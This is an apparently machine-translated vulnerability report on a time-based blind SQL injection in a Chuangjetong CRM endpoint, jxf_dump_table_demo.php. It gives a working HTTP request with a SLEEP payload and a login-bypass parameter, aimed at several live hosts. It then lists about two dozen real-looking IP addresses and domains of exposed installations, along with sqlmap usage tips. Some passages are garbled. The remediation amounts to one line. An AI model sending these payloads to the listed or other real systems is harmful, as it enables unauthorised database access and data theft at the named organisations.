Changjetong CRM is vulnerable to SQL injection

[hacker-routing]

I. Vulnerability Description
A vulnerability exists in the Chuangjetong Information Technology Co., Ltd.'s Chuangjetong CRM system, allowing attackers to obtain information.

II. Vulnerability Impact
Chuangjetong CRM

This vulnerability is unique; it cannot carry cookies. Burp Suite and SQLmap cannot carry cookies either! I tested it directly with my PoC! The vulnerability has high network requirements.

III. Vulnerability Reproduction

Reproduction 1

IP: http://111.206.233.35:8089

Constructing a POC

GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: 111.206.233.35:8089
Connection: close

Manual verification, sleep for 2 seconds

Sqlmap has been confirmed to have a vulnerability. This vulnerability is somewhat unique; it cannot be run with cookies. Use my PoC (protocol for SQL injection) with the command -r, but do not use SQLmap's custom cookies. Mark the injection point with *.

Python: sqlmap.py -r

Cookie should be set to n.

302 select n

Sqlmap has been confirmed to have a vulnerability.

Reproduction 2

IP: http://shcsy.ufyct.com:8000
Construct a POC as follows, successfully verifying the existence of an SQL injection vulnerability

POC:

GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: shcsy.ufyct.com:8000
Connection: close

Manual verification, sleep

Reproduction 3
(1) IP: http://124.71.22.118:8000

(2) Construct a POC, as follows, successfully verifying the existence of an SQL injection vulnerability

POC:

GET /tools/jxf_dump_table_demo.php?id=1&gblOrgID=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-&DontCheckLogin=1 HTTP/1.1
Host: 124.71.22.118:8000
Connection: close

(3) Manual verification

Other IP addresses:
http://ecs-124-71-22-118.compute.hwclouds-dns.com:8000
http://116.237.71.147:8000
http://180.172.75.165:8888/
http://mlylqc.ufyct.com:8000
http://116.237.35.159:8000
http://47.120.51.105:8090/
https://cshyqdzkj.gnway.cc
http://111.206.233.35:8089
http://shcsy.ufyct.com:8000
http://125.123.66.85:8000
http://116.237.35.159:8000
http://shcsy.ufyct.com:8000
http://49.4.122.252:8090
http://125.123.66.81:8000
http://118.212.70.254:8000
http://159.75.254.78:66
http://222.128.95.39:8080
http://103.159.124.70:8200
http://27.152.154.53:8090
http://47.119.204.208:66
http://118.212.70.33:8000
http://118.212.70.86:8000
http://14.19.178.68:9090
http://124.71.22.118:8000
http://110.87.107.101:8090
http://mlylqc.ufyct.com:8000

Remediation suggestion: Filter parameters to prevent SQL injection.